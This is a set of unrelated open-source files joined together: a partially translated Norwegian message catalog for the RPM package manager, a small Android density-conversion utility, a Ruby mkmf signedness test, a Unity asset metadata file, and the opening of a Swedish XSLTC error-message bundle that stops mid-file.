msgid "do not execute any %%triggerun scriptlet(s)"
msgstr "ikke kjør %%triggerun skriplets"
#, c-format
msgid "do not execute any %%triggerpostun scriptlet(s)"
msgstr "ikke kjør %%triggerpostun skriptlets"
msgid ""
"upgrade to an old version of the package (--force on upgrades does this "
"automatically)"
msgstr ""
"oppgrader til en gammel versjon av pakken (--force ved oppgraderinger gjør "
"dette automatisk)"
msgid "print percentages as package installs"
msgstr "skriv ut prosentvis fremgang etter som pakken installeres"
msgid "relocate the package to <dir>, if relocatable"
msgstr "omplasser pakken til <kat>, hvis den er omplasserbar"
msgid "<dir>"
msgstr "<kat>"
msgid "relocate files from path <old> to <new>"
msgstr "omplasser filer fra sti <gml> til <ny>"
msgid "<old>=<new>"
msgstr "<gml>=<ny>"
msgid "ignore file conflicts between packages"
msgstr ""
msgid "reinstall if the package is already present"
msgstr "reinstaller selv om pakken allerede er installert"
msgid "don't install, but tell if it would work or not"
msgstr "ikke installer, men si ifra om det ville virke eller ikke"
msgid "upgrade package(s)"
msgstr "oppgrader pakke(r)"
msgid "reinstall package(s)"
msgstr ""
msgid "query/verify all packages"
msgstr "spør/verifiser alle pakker"
msgid "rpm checksig mode"
msgstr ""
msgid "query/verify package(s) owning file"
msgstr "spør/verifiser pakke(r) som eier fil"
msgid "query/verify package(s) in group"
msgstr "spør/verifiser pakke(r) i gruppe"
msgid "query/verify a package file"
msgstr ""
msgid "query/verify package(s) with package identifier"
msgstr ""
msgid "query/verify package(s) with header identifier"
msgstr ""
msgid "rpm query mode"
msgstr "rpm spørremodus"
msgid "query/verify a header instance"
msgstr ""
msgid "query/verify package(s) from install transaction"
msgstr ""
msgid "query the package(s) triggered by the package"
msgstr "spør pakker utløst av <pakke>"
msgid "rpm verify mode"
msgstr ""
msgid "query/verify the package(s) which require a dependency"
msgstr "spør etter etter pakker som trenger <funk> funksjonalitet"
msgid "query/verify the package(s) which obsolete a dependency"
msgstr ""
msgid "query/verify the package(s) which provide a dependency"
msgstr "spør etter pakker som tilbyr <funk> funksjonalitet"
msgid "query/verify the package(s) which recommends a dependency"
msgstr ""
msgid "query/verify the package(s) which suggests a dependency"
msgstr ""
msgid "query/verify the package(s) which supplements a dependency"
msgstr ""
msgid "query/verify the package(s) which enhances a dependency"
msgstr ""
msgid "do not glob arguments"
msgstr ""
msgid "do not process non-package files as manifests"
msgstr ""
msgid "only include configuration files"
msgstr ""
msgid "only include documentation files"
msgstr ""
msgid "only include license files"
msgstr ""
msgid "only include artifact files"
msgstr ""
#, c-format
msgid "exclude %%ghost files"
msgstr ""
#, c-format
msgid "exclude %%config files"
msgstr ""
#, c-format
msgid "exclude %%artifact files"
msgstr ""
msgid "dump basic file information"
msgstr ""
msgid "list files in package"
msgstr ""
msgid "display the states of the listed files"
msgstr ""
msgid "don't verify size of files"
msgstr "ikke verifiser størrelse på filer"
msgid "don't verify symlink path of files"
msgstr "ikke verifiser sti til symbolske lenker for filer"
msgid "don't verify owner of files"
msgstr "ikke verifiser eier av filer"
msgid "don't verify group of files"
msgstr "ikke verifiser gruppe for filer"
msgid "don't verify modification time of files"
msgstr "ikke verifisert endringsdato for filer"
msgid "don't verify mode of files"
msgstr "ikke verifiser modus for filer"
msgid "don't verify file security contexts"
msgstr ""
msgid "don't verify capabilities of files"
msgstr ""
msgid "don't verify files in package"
msgstr "ikke verifiser filer i pakke"
msgid "don't verify package dependencies"
msgstr "ikke verifiser pakkeavhengigheter"
msgid "don't execute verify script(s)"
msgstr ""
#, c-format
msgid "Missing rpmlib features for %s:\n"
msgstr ""
msgid "source package expected, binary found\n"
msgstr "kildepakke forventet, binær funnet\n"
msgid "source package contains no .spec file\n"
msgstr "kildepakke inneholder ikke en .spec-fil\n"
#, c-format
msgid "unpacking of archive failed%s%s: %s\n"
msgstr ""
msgid " on file "
msgstr ""
#, c-format
msgid "incorrect format: %s\n"
msgstr "ukorrekt format: %s\n"
msgid "(contains no files)\n"
msgstr ""
msgid "normal "
msgstr "normal "
msgid "replaced "
msgstr "erstattet "
msgid "not installed "
msgstr "ikke installert"
msgid "net shared "
msgstr "delt via nett "
msgid "wrong color "
msgstr ""
msgid "(no state) "
msgstr "(ingen tilstand)"
#, c-format
msgid "(unknown %3d) "
msgstr "(ukjent %3d) "
msgid "package has not file owner/group lists\n"
msgstr ""
msgid "package has neither file owner or id lists\n"
msgstr "pakken har verken fileier eller id-lister\n"
#, c-format
msgid "group %s does not contain any packages\n"
msgstr "gruppe %s inneholder ingen pakker\n"
#, c-format
msgid "no package triggers %s\n"
msgstr "ingen pakke utløser %s\n"
#, c-format
msgid "malformed %s: %s\n"
msgstr ""
#, c-format
msgid "no package matches %s: %s\n"
msgstr ""
#, c-format
msgid "no package conflicts %s\n"
msgstr ""
#, c-format
msgid "no package obsoletes %s\n"
msgstr ""
#, c-format
msgid "no package requires %s\n"
msgstr "ingen pakke krever %s\n"
#, c-format
msgid "no package recommends %s\n"
msgstr ""
#, c-format
msgid "no package suggests %s\n"
msgstr ""
#, c-format
msgid "no package supplements %s\n"
msgstr ""
#, c-format
msgid "no package enhances %s\n"
msgstr ""
#, c-format
msgid "no package provides %s\n"
msgstr "ingen pakke gir %s\n"
#, c-format
msgid "file %s: %s\n"
msgstr "fil %s: %s\n"
#, c-format
msgid "file %s is not owned by any package\n"
msgstr "filen %s eies ikke av noen pakke\n"
#, c-format
msgid "invalid package number: %s\n"
msgstr "ugyldig pakkenummer: %s\n"
#, c-format
msgid "record %u could not be read\n"
msgstr ""
#, c-format
msgid "package %s is not installed\n"
msgstr "pakke %s er ikke installert\n"
#, c-format
msgid "unknown tag: \"%s\"\n"
msgstr ""
#, c-format
msgid "%s: key %d import failed.\n"
msgstr ""
#, c-format
msgid "%s: key %d not an armored public key.\n"
msgstr ""
#, c-format
msgid "%s: import read failed(%d).\n"
msgstr ""
#, c-format
msgid "Fread failed: %s"
msgstr ""
msgid "DIGESTS"
msgstr ""
msgid "digests"
msgstr ""
msgid "SIGNATURES"
msgstr ""
msgid "signatures"
msgstr ""
msgid "NOT OK"
msgstr "IKKE OK"
msgid "OK"
msgstr "OK"
#, c-format
msgid "%s: open failed: %s\n"
msgstr "%s: åpne feilet: %s\n"
#, c-format
msgid "Unable to open current directory: %m\n"
msgstr ""
#, c-format
msgid "%s: chroot directory not set\n"
msgstr ""
#, c-format
msgid "Unable to change root directory: %m\n"
msgstr ""
#, c-format
msgid "Unable to restore root directory: %m\n"
msgstr ""
#, c-format
msgid "Generating %d missing index(es), please wait...\n"
msgstr ""
#, c-format
msgid "cannot open %s index using %s - %s (%d)\n"
msgstr ""
msgid "no dbpath has been set\n"
msgstr ""
msgid "miFreeHeader: skipping"
msgstr ""
#, c-format
msgid "error(%d) storing record #%d into %s\n"
msgstr ""
#, c-format
msgid "%s: regexec failed: %s\n"
msgstr ""
#, c-format
msgid "%s: regcomp failed: %s\n"
msgstr ""
msgid "rpmdbNextIterator: skipping"
msgstr ""
#, c-format
msgid "rpmdb: damaged header #%u retrieved -- skipping.\n"
msgstr ""
#, c-format
msgid "%s: cannot read header at 0x%x\n"
msgstr ""
msgid "could not move new database in place\n"
msgstr ""
#, c-format
msgid "could also not restore old database from %s\n"
msgstr ""
#, c-format
msgid "replace files in %s with files from %s to recover\n"
msgstr ""
#, c-format
msgid "Could not get public keys from %s\n"
msgstr ""
#, c-format
msgid "could not delete old database at %s\n"
msgstr ""
msgid "no dbpath has been set"
msgstr ""
#, c-format
msgid "failed to create directory %s: %s\n"
msgstr ""
#, c-format
msgid "header #%u in the database is bad -- skipping.\n"
msgstr ""
#, c-format
msgid "cannot add record originally at %u\n"
msgstr ""
msgid "failed to rebuild database: original database remains in place\n"
msgstr ""
msgid "failed to replace old database with new database!\n"
msgstr ""
msgid "NO "
msgstr "NEI"
msgid "YES"
msgstr "JA"
msgid "PreReq:, Provides:, and Obsoletes: dependencies support versions."
msgstr ""
msgid "file name(s) stored as (dirName,baseName,dirIndex) tuple, not as path."
msgstr ""
msgid "package payload can be compressed using bzip2."
msgstr ""
msgid "package payload can be compressed using xz."
msgstr ""
msgid "package payload can be compressed using lzma."
msgstr ""
msgid "package payload file(s) have \"./\" prefix."
msgstr ""
msgid "package name-version-release is not implicitly provided."
msgstr ""
msgid "header tags are always sorted after being loaded."
msgstr ""
msgid "the scriptlet interpreter can use arguments from header."
msgstr ""
msgid "a hardlink file set may be installed without being complete."
msgstr ""
msgid "package scriptlets may access the rpm database while installing."
msgstr ""
msgid "internal support for lua scripts."
msgstr ""
msgid "file digest algorithm is per package configurable"
msgstr ""
msgid "support for POSIX.1e file capabilities"
msgstr ""
msgid "package scriptlets can be expanded at install time."
msgstr ""
msgid "dependency comparison supports versions with tilde."
msgstr ""
msgid "dependency comparison supports versions with caret."
msgstr ""
msgid "support files larger than 4GB"
msgstr ""
msgid "support for rich dependencies."
msgstr ""
msgid "support for dynamic buildrequires."
msgstr ""
msgid "package payload can be compressed using zstd."
msgstr ""
#, c-format
msgid "Unknown rich dependency op '%.*s'"
msgstr ""
msgid "Name required"
msgstr ""
msgid "Illegal ops in with/without"
msgstr ""
msgid "Illegal context for 'unless', please use 'or' instead"
msgstr ""
msgid "Illegal context for 'if', please use 'and' instead"
msgstr ""
msgid "Rich dependency does not start with '('"
msgstr ""
msgid "Missing argument to rich dependency op"
msgstr ""
msgid "Empty rich dependency"
msgstr ""
#, c-format
msgid "Unterminated rich dependency: %s"
msgstr ""
msgid "Cannot chain different ops"
msgstr ""
msgid "Can only chain and/or/with ops"
msgstr ""
msgid "Junk after rich dependency"
msgstr ""
#, c-format
msgid "user %s does not exist - using %s\n"
msgstr ""
#, c-format
msgid "group %s does not exist - using %s\n"
msgstr ""
#, c-format
msgid "Wrong number of entries for tag %s: %u found but %u expected.\n"
msgstr ""
#, c-format
msgid "Malformed data for tag %s: %u bytes found but %lu expected.\n"
msgstr ""
msgid "Bad magic"
msgstr "Ugyldig magi"
msgid "Bad/unreadable header"
msgstr "Ugyldig/ulesbar header"
msgid "Header size too big"
msgstr "For stor header"
msgid "File too large for archive"
msgstr ""
msgid "Unknown file type"
msgstr "Ukjent filtype"
msgid "Missing file(s)"
msgstr ""
msgid "Digest mismatch"
msgstr ""
msgid "Internal error"
msgstr "Intern feil"
msgid "Archive file not in header"
msgstr ""
msgid "File from package already exists as a directory in system"
msgstr ""
msgid " failed - "
msgstr " feilet - "
#, c-format
msgid "%s: (error 0x%x)"
msgstr ""
#, c-format
msgid "open of %s failed: %s\n"
msgstr "feil under åpning av %s: %s\n"
#, c-format
msgid "Max level of manifest recursion exceeded: %s\n"
msgstr ""
#, c-format
msgid "%s: not an rpm package (or package manifest)\n"
msgstr ""
#, c-format
msgid "Updating / installing...\n"
msgstr ""
#, c-format
msgid "Cleaning up / removing...\n"
msgstr ""
msgid "Preparing..."
msgstr "Forbereder..."
msgid "Verifying..."
msgstr ""
msgid "Preparing packages..."
msgstr ""
msgid "Verifying packages..."
msgstr ""
msgid "Failed dependencies:\n"
msgstr ""
#, c-format
msgid "%s: not an rpm package (or package manifest): %s\n"
msgstr ""
#, c-format
msgid "%s cannot be installed\n"
msgstr ""
#, c-format
msgid "Retrieving %s\n"
msgstr "Henter %s\n"
#, c-format
msgid "skipping %s - transfer failed\n"
msgstr ""
#, c-format
msgid "package %s is not relocatable\n"
msgstr ""
#, c-format
msgid "error reading from file %s\n"
msgstr "feil under lesing fra fil %s\n"
#, c-format
msgid "\"%s\" specifies multiple packages:\n"
msgstr ""
#, c-format
msgid "cannot open %s: %s\n"
msgstr "kan ikke åpne %s: %s\n"
#, c-format
msgid "Installing %s\n"
msgstr "Installerer %s\n"
msgid "not an rpm package"
msgstr ""
msgid "illegal signature type"
msgstr ""
msgid "unsupported RPM package version"
msgstr ""
#, c-format
msgid "read failed: %s (%d)\n"
msgstr "lesing feilet: %s (%d)\n"
msgid "not an rpm package\n"
msgstr ""
#, c-format
msgid "can't create %s lock on %s (%s)\n"
msgstr ""
#, c-format
msgid "waiting for %s lock on %s\n"
msgstr ""
#, c-format
msgid "Failed to dlopen %s %s\n"
msgstr ""
#, c-format
msgid "Failed to resolve symbol %s: %s\n"
msgstr ""
#, c-format
msgid "Plugin %%__%s_%s not configured\n"
msgstr ""
#, c-format
msgid "Plugin %s not loaded\n"
msgstr ""
msgid "different"
msgstr ""
#, c-format
msgid "package %s is intended for a %s architecture"
msgstr ""
#, c-format
msgid "package %s is intended for a %s operating system"
msgstr ""
#, c-format
msgid "package %s is already installed"
msgstr "pakke %s er allerede installert"
#, fuzzy, c-format
msgid "package %s is not installed"
msgstr "pakke %s er ikke installert\n"
#, c-format
msgid "path %s in package %s is not relocatable"
msgstr ""
#, c-format
msgid "file %s conflicts between attempted installs of %s and %s"
msgstr ""
#, c-format
msgid "file %s from install of %s conflicts with file from package %s"
msgstr ""
#, c-format
msgid "package %s (which is newer than %s) is already installed"
msgstr ""
#, c-format
msgid ""
"installing package %s needs %<PRIu64>%cB more space on the %s filesystem"
msgstr ""
#, c-format
msgid "installing package %s needs %<PRIu64> more inodes on the %s filesystem"
msgstr ""
#, c-format
msgid "%s is needed by %s%s"
msgstr ""
msgid "(installed) "
msgstr ""
#, c-format
msgid "%s conflicts with %s%s"
msgstr ""
#, c-format
msgid "%s is obsoleted by %s%s"
msgstr ""
#, c-format
msgid "package %s does not verify: %s"
msgstr ""
#, c-format
msgid "unknown error %d encountered while manipulating package %s"
msgstr ""
#, c-format
msgid "missing second ':' at %s:%d\n"
msgstr "mangler andre ':' ved %s:%d\n"
#, c-format
msgid "missing architecture name at %s:%d\n"
msgstr "manglende navn på arkitektur ved %s:%d\n"
#, c-format
msgid "Incomplete data line at %s:%d\n"
msgstr "Ukomplett datalinje ved %s:%d\n"
#, c-format
msgid "Too many args in data line at %s:%d\n"
msgstr "For mange argumenter i datalinje ved %s:%d\n"
#, c-format
msgid "Bad arch/os number: %s (%s:%d)\n"
msgstr ""
#, c-format
msgid "Incomplete default line at %s:%d\n"
msgstr "Ukomplett standardlinje ved %s:%d\n"
#, c-format
msgid "Too many args in default line at %s:%d\n"
msgstr ""
#, c-format
msgid "missing ':' (found 0x%02x) at %s:%d\n"
msgstr "mangler ':' (fant 0x%02X) ved %s:%d\n"
#, c-format
msgid "missing argument for %s at %s:%d\n"
msgstr "manglende argumentfor %s ved %s:%d\n"
#, c-format
msgid "cannot open %s at %s:%d: %m\n"
msgstr ""
#, c-format
msgid "missing architecture for %s at %s:%d\n"
msgstr "manglende arkitektur for %s ved %s:%d\n"
#, c-format
msgid "bad option '%s' at %s:%d\n"
msgstr "ugyldig flagg '%s' ved %s:%d\n"
msgid "Failed to read auxiliary vector, /proc not mounted?\n"
msgstr ""
#, c-format
msgid "Unknown system: %s\n"
msgstr ""
#, c-format
msgid "Please contact %s\n"
msgstr ""
#, c-format
msgid "Unable to open %s for reading: %m.\n"
msgstr ""
msgid "failed to register exit handler"
msgstr ""
msgid "No exec() called after fork() in lua scriptlet\n"
msgstr ""
#, c-format
msgid "Unable to restore current directory: %m"
msgstr ""
msgid "<lua> scriptlet support not built in\n"
msgstr ""
#, c-format
msgid "failed to exec scriptlet interpreter %s: %s\n"
msgstr ""
#, c-format
msgid "Couldn't create temporary file for %s: %s\n"
msgstr ""
#, c-format
msgid "Couldn't duplicate file descriptor: %s: %s\n"
msgstr ""
#, c-format
msgid "Fwrite failed: %s"
msgstr ""
#, c-format
msgid "%s scriptlet failed, waitpid(%d) rc %d: %s\n"
msgstr ""
#, c-format
msgid "%s scriptlet failed, signal %d\n"
msgstr ""
#, c-format
msgid "%s scriptlet failed, exit status %d\n"
msgstr ""
msgid "Unknown format"
msgstr ""
msgid "install"
msgstr ""
msgid "erase"
msgstr ""
msgid "rpmdb"
msgstr ""
#, c-format
msgid "cannot open Packages database in %s\n"
msgstr "kan ikke åpne pakkedatabase i %s\n"
#, c-format
msgid "extra '(' in package label: %s\n"
msgstr ""
#, c-format
msgid "missing '(' in package label: %s\n"
msgstr ""
#, c-format
msgid "missing ')' in package label: %s\n"
msgstr ""
#, c-format
msgid "%s: reading of public key failed.\n"
msgstr ""
#, c-format
msgid "invalid package verify level %s\n"
msgstr ""
msgid "transaction"
msgstr ""
#, c-format
msgid "%s tag %u: invalid type %u"
msgstr ""
#, c-format
msgid "%s: tag %u: invalid count %u"
msgstr ""
#, c-format
msgid "%s tag %u: invalid data %p (%u)"
msgstr ""
#, c-format
msgid "%s tag %u: invalid size %u"
msgstr ""
#, c-format
msgid "%s tag %u: invalid OpenPGP signature"
msgstr ""
#, c-format
msgid "%s: tag %u: invalid hex"
msgstr ""
#, c-format
msgid "%s%s%s %s"
msgstr ""
msgid "digest"
msgstr ""
#, c-format
msgid "%s%s"
msgstr ""
msgid "signature"
msgstr ""
msgid "header"
msgstr ""
msgid "package"
msgstr ""
msgid "Header "
msgstr ""
msgid "Payload "
msgstr ""
msgid "Unable to reload signature header.\n"
msgstr ""
msgid "no signature"
msgstr ""
msgid "no digest"
msgstr ""
msgid "skipped"
msgstr ""
msgid "failed"
msgstr ""
msgid "no state"
msgstr ""
msgid "unknown state"
msgstr ""
#, c-format
msgid "missing %c %s"
msgstr ""
#, c-format
msgid "Unsatisfied dependencies for %s:\n"
msgstr ""
#, c-format
msgid "Unable to reset nice value: %s"
msgstr ""
#, c-format
msgid "Unable to reset I/O priority: %s"
msgstr ""
#, fuzzy
msgid "syntax error while parsing =="
msgstr "syntaksfeil under lesing av ==\n"
#, fuzzy
msgid "syntax error while parsing &&"
msgstr "syntaksfeil under lesing av &&\n"
#, fuzzy
msgid "syntax error while parsing ||"
msgstr "syntaksfeil under lesing av ||\n"
msgid "macro expansion returned a bare word, please use \"...\""
msgstr ""
msgid "macro expansion did not return an integer"
msgstr ""
#, c-format
msgid "expanded string: %s\n"
msgstr ""
#, fuzzy
msgid "unterminated string in expression"
msgstr "syntaksfeil i uttrykk\n"
msgid "invalid version"
msgstr ""
msgid "bare words are no longer supported, please use \"...\""
msgstr ""
#, fuzzy
msgid "parse error in expression"
msgstr "feil under lesing av uttrykk\n"
#, fuzzy
msgid "unmatched ("
msgstr "ubalansert (\n"
#, fuzzy
msgid "- only on numbers"
msgstr "- kun på tall\n"
#, fuzzy
msgid "unexpected end of expression"
msgstr "uventet spørringskilde"
#, fuzzy
msgid "syntax error in expression"
msgstr "syntaksfeil i uttrykk\n"
#, fuzzy
msgid "types must match"
msgstr "typene må være like\n"
msgid "division by zero"
msgstr ""
#, fuzzy
msgid "* and / not supported for strings"
msgstr "* / ikke støttet for strenger\n"
#, fuzzy
msgid "- not supported for strings"
msgstr "- ikke støttet for strenger\n"
#, c-format
msgid "%3d>%*s(empty)\n"
msgstr ""
#, c-format
msgid "%3d<%*s(empty)\n"
msgstr ""
#, fuzzy, c-format
msgid "Failed to open shell expansion pipe for command: %s: %m \n"
msgstr "Kunne ikke åpne tar-rør: %m\n"
#, c-format
msgid "Macro %%%s has illegal name (%s)\n"
msgstr ""
#, c-format
msgid "Macro %%%s is a built-in (%s)\n"
msgstr ""
#, c-format
msgid "Macro %%%s has unterminated opts\n"
msgstr ""
#, c-format
msgid "Macro %%%s has unterminated body\n"
msgstr ""
#, c-format
msgid "Macro %%%s has empty body\n"
msgstr ""
#, c-format
msgid "Macro %%%s needs whitespace before body\n"
msgstr ""
#, c-format
msgid "Macro %%%s failed to expand\n"
msgstr ""
#, c-format
msgid "Macro %%%s defined but not used within scope\n"
msgstr ""
#, c-format
msgid "Unknown option %c in %s(%s)\n"
msgstr ""
#, c-format
msgid "no such macro: '%s'\n"
msgstr ""
msgid ""
"Too many levels of recursion in macro expansion. It is likely caused by "
"recursive macro declaration.\n"
msgstr ""
#, c-format
msgid "Unterminated %c: %s\n"
msgstr ""
#, c-format
msgid "A %% is followed by an unparseable macro\n"
msgstr ""
msgid "argument expected"
msgstr ""
#, fuzzy
msgid "unexpected argument"
msgstr "ventet spørringsformat"
#, c-format
msgid "======================== active %d empty %d\n"
msgstr ""
#, c-format
msgid "error creating temporary file %s: %m\n"
msgstr ""
#, c-format
msgid "File %s: %s\n"
msgstr "Fil %s: %s\n"
#, c-format
msgid "File %s is smaller than %u bytes\n"
msgstr "Fil %s er mindre enn %u bytes\n"
msgid "[none]"
msgstr ""
msgid "(no error)"
msgstr ""
msgid "fatal error: "
msgstr "fatal feil: "
msgid "error: "
msgstr "feil: "
msgid "warning: "
msgstr "advarsel: "
msgid "Error writing to log"
msgstr ""
#, c-format
msgid "invalid syntax in lua scriptlet: %s\n"
msgstr ""
#, c-format
msgid "invalid syntax in lua script: %s\n"
msgstr ""
#, c-format
msgid "lua script failed: %s\n"
msgstr ""
#, c-format
msgid "invalid syntax in lua file: %s\n"
msgstr ""
#, c-format
msgid "lua hook failed: %s\n"
msgstr ""
#, c-format
msgid "memory alloc (%u bytes) returned NULL.\n"
msgstr ""
#, c-format
msgid "Unsupported version of key: V%d\n"
msgstr ""
#, c-format
msgid "V%d %s/%s %s, key ID %s"
msgstr ""
msgid "(none)"
msgstr ""
#, c-format
msgid "exiting on signal %d from pid %d\n"
msgstr ""
#, c-format
msgid "%s: Fwrite failed: %s\n"
msgstr "%s: Fwrite feilet: %s\n"
#, c-format
msgid "%s: Fread failed: %s\n"
msgstr "%s: Fread feilet: %s\n"
#, c-format
msgid "%s: Fflush failed: %s\n"
msgstr ""
msgid "Unsupported PGP signature\n"
msgstr ""
#, c-format
msgid "Unsupported PGP hash algorithm %u\n"
msgstr ""
#, c-format
msgid "Unsupported PGP pubkey algorithm %u\n"
msgstr ""
#, fuzzy, c-format
msgid "Could not create pipe for signing: %m\n"
msgstr "Kunne ikke åpne %s: %s\n"
#, fuzzy, c-format
msgid "Could not set GPG_TTY to stdin: %m\n"
msgstr "Kunne ikke åpne %s: %s\n"
#, c-format
msgid "Could not exec %s: %s\n"
msgstr ""
#, fuzzy, c-format
msgid "Could not open pipe for writing: %m\n"
msgstr "Kunne ikke åpne %s: %s\n"
msgid "Could not write to pipe\n"
msgstr ""
#, c-format
msgid "Could not read from file %s: %s\n"
msgstr ""
#, c-format
msgid "gpg exec failed (%d)\n"
msgstr ""
msgid "gpg failed to write signature\n"
msgstr ""
msgid "unable to read the signature\n"
msgstr ""
msgid "file signing support not built in\n"
msgstr ""
#, c-format
msgid "%s: rpmReadSignature failed: %s"
msgstr ""
#, c-format
msgid "%s: headerRead failed: %s\n"
msgstr ""
msgid "Cannot sign RPM v3 packages\n"
msgstr ""
#, c-format
msgid "%s already contains identical signature, skipping\n"
msgstr ""
#, c-format
msgid "%s: rpmWriteSignature failed: %s\n"
msgstr "%s: rpmWriteSignature feilet: %s\n"
msgid "rpmMkTemp failed\n"
msgstr ""
#, c-format
msgid "%s: writeLead failed: %s\n"
msgstr "%s: writeLead feilet: %s\n"
#, c-format
msgid "replacing %s failed: %s\n"
msgstr ""
msgid "sign_hash failed\n"
msgstr ""
msgid "File digest algorithm id is invalid"
msgstr ""
msgid "signFile failed\n"
msgstr ""
msgid "headerPutString failed\n"
msgstr ""
#, c-format
msgid "%s: read manifest failed: %s\n"
msgstr "%s: lesing av manifest feilet: %s\n"
msgid "don't verify header+payload signature"
msgstr ""
#~ msgid "Failed to rename %s to %s: %m\n"
#~ msgstr "Feil under endring av navn fra %s til %s: %m\n"
| {
"pile_set_name": "Github"
} |
package tv.acfun.a63.util;
import tv.acfun.a63.AcApp;
import android.content.Context;
public class DensityUtil {
public static int dip2px(Context context, float dipValue) {
if(AcApp.density == 1f){
AcApp.density = context.getResources().getDisplayMetrics().density;
}
return (int) (dipValue * AcApp.density + 0.5f);
}
public static int px2dip(Context context, float pxValue) {
if(AcApp.density == 1f){
AcApp.density = context.getResources().getDisplayMetrics().density;
}
return (int) (pxValue / AcApp.density + 0.5f);
}
}
| {
"pile_set_name": "Github"
} |
require_relative 'base'
class TestMkmf
class TestSignedness < TestMkmf
def test_typeof_builtin
bug4144 = '[ruby-dev:42731]'
[["", "-1"], ["signed ", "-1"], ["unsigned ", "+1"]].each do |signed, expect|
%w[short int long].each do |type|
assert_equal(expect.to_i, mkmf {check_signedness(signed+type)}, mkmflog(bug4144))
end
end
end
def test_typeof_typedef
[["", "-1"], ["signed ", "-1"], ["unsigned ", "+1"]].each do |signed, expect|
%w[short int long].each do |type|
open("confdefs.h", "w") {|f|
f.puts "typedef #{signed}#{type} test1_t;"
}
$defs.clear
assert_equal(expect.to_i, mkmf {check_signedness("test1_t", "confdefs.h")}, MKMFLOG)
assert_include($defs, "-DSIGNEDNESS_OF_TEST1_T=#{expect}")
end
end
ensure
File.unlink("confdefs.h")
end
end
end
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: d26cf94ed562448e59249505a524cf93
timeCreated: 1482933200
licenseType: Pro
MonoImporter:
serializedVersion: 2
defaultReferences: []
executionOrder: 0
icon: {instanceID: 0}
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
/*
* reserved comment block
* DO NOT REMOVE OR ALTER!
*/
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.sun.org.apache.xalan.internal.xsltc.runtime;
import java.util.ListResourceBundle;
/**
* @author Morten Jorgensen
*/
public class ErrorMessages_sv extends ListResourceBundle {
/*
* XSLTC run-time error messages.
*
* General notes to translators and definitions:
*
* 1) XSLTC is the name of the product. It is an acronym for XML Stylesheet:
* Transformations Compiler
*
* 2) A stylesheet is a description of how to transform an input XML document
* into a resultant output XML document (or HTML document or text)
*
* 3) An axis is a particular "dimension" in a tree representation of an XML
* document; the nodes in the tree are divided along different axes.
* Traversing the "child" axis, for instance, means that the program
* would visit each child of a particular node; traversing the "descendant"
* axis means that the program would visit the child nodes of a particular
* node, their children, and so on until the leaf nodes of the tree are
* reached.
*
* 4) An iterator is an object that traverses nodes in a tree along a
* particular axis, one at a time.
*
* 5) An element is a mark-up tag in an XML document; an attribute is a
* modifier on the tag. For example, in <elem attr='val' attr2='val2'>
* "elem" is an element name, "attr" and "attr2" are attribute names with
* the values "val" and "val2", respectively.
*
* 6) A namespace declaration is a special attribute that is used to associate
* a prefix with a URI (the namespace). The meanings of element names and
* attribute names that use that prefix are defined with respect to that
* namespace.
*
* 7) DOM is an acronym for Document Object Model. It is a tree
* representation of an XML document.
*
* SAX is an acronym for the Simple API for XML processing. It is an API
* used inform an XML processor (in this case XSLTC) of the structure and
* content of an XML document.
*
* Input to the stylesheet processor can come from an XML parser in the
* form of a DOM tree or through the SAX API.
*
* 8) DTD is a document type declaration. It is a way of specifying the
* grammar for an XML file, the names and types of elements, attributes,
* etc.
*
* 9) Translet is an invented term that refers to the class file that contains
* the compiled form of a stylesheet.
*/
// These message should be read from a locale-specific resource bundle
/** Get the lookup table for error messages.
*
* @return The message lookup table.
*/
public Object[][] getContents()
{
return new Object[][] {
/*
* Note to translators: the substitution text in the following message
* is a class name. Used for internal errors in the processor.
*/
{BasisLibrary.RUN_TIME_INTERNAL_ERR,
"Internt exekveringsfel i ''{0}''"},
/*
* Note to translators: <xsl:copy> is a keyword that should not be
* translated.
*/
{BasisLibrary.RUN_TIME_COPY_ERR,
"Exekveringsexekveringsfel av <xsl:copy>."},
/*
* Note to translators: The substitution text refers to data types.
* The message is displayed if a value in a particular context needs to
* be converted to type {1}, but that's not possible for a value of type
* {0}.
*/
{BasisLibrary.DATA_CONVERSION_ERR,
"Ogiltig konvertering fr\u00E5n ''{0}'' till ''{1}''."},
/*
* Note to translators: This message is displayed if the function named
* by the substitution text is not a function that is supported. XSLTC
* is the acronym naming the product.
*/
{BasisLibrary.EXTERNAL_FUNC_ERR,
"Den externa funktionen ''{0}'' underst\u00F6ds inte i XSLTC."},
/*
* Note to translators: This message is displayed if two values are
* compared for equality, but the data type of one of the values is
* unknown.
*/
{BasisLibrary.EQUALITY_EXPR_ERR,
"Ok\u00E4nd argumenttyp i likhetsuttryck."},
/*
* Note to translators: The substitution text for {0} will be a data
* type; the substitution text for {1} will be the name of a function.
* This is displayed if an argument of the particular data type is not
* permitted for a call to this function.
*/
{BasisLibrary.INVALID_ARGUMENT_ERR,
"Argumenttyp ''{0}'' i anrop till ''{1}'' \u00E4r inte giltig"},
/*
* Note to translators: There is way of specifying a format for a
* number using a pattern; the processor was unable to format the
* particular value using the specified pattern.
*/
{BasisLibrary.FORMAT_NUMBER_ERR,
"F\u00F6rs\u00F6ker formatera talet ''{0}'' med m\u00F6nstret ''{1}''."},
/*
* Note to translators: The following represents an internal error
* situation in XSLTC. The processor was unable to create a copy of an
* iterator. (See definition of iterator above.)
*/
{BasisLibrary.ITERATOR_CLONE_ERR,
"Kan inte klona iteratorn ''{0}''."},
/*
* Note to translators: The following represents an internal error
* situation in XSLTC. The processor attempted to create an iterator
* for a particular axis (see definition above) that it does not
* support.
*/
{BasisLibrary.AXIS_SUPPORT_ERR,
"Iteratorn f\u00F6r axeln ''{0}'' underst\u00F6ds inte."},
/*
* Note to translators: The following represents an internal error
* situation in XSLTC. The processor attempted to create an iterator
* for a particular axis (see definition above) that it does not
* support.
*/
{BasisLibrary.TYPED_AXIS_SUPPORT_ERR,
"Iteratorn f\u00F6r den typade axeln ''{0}'' underst\u00F6ds inte."},
/*
* Note to translators: This message is reported if the stylesheet
* being processed attempted to construct an XML document with an
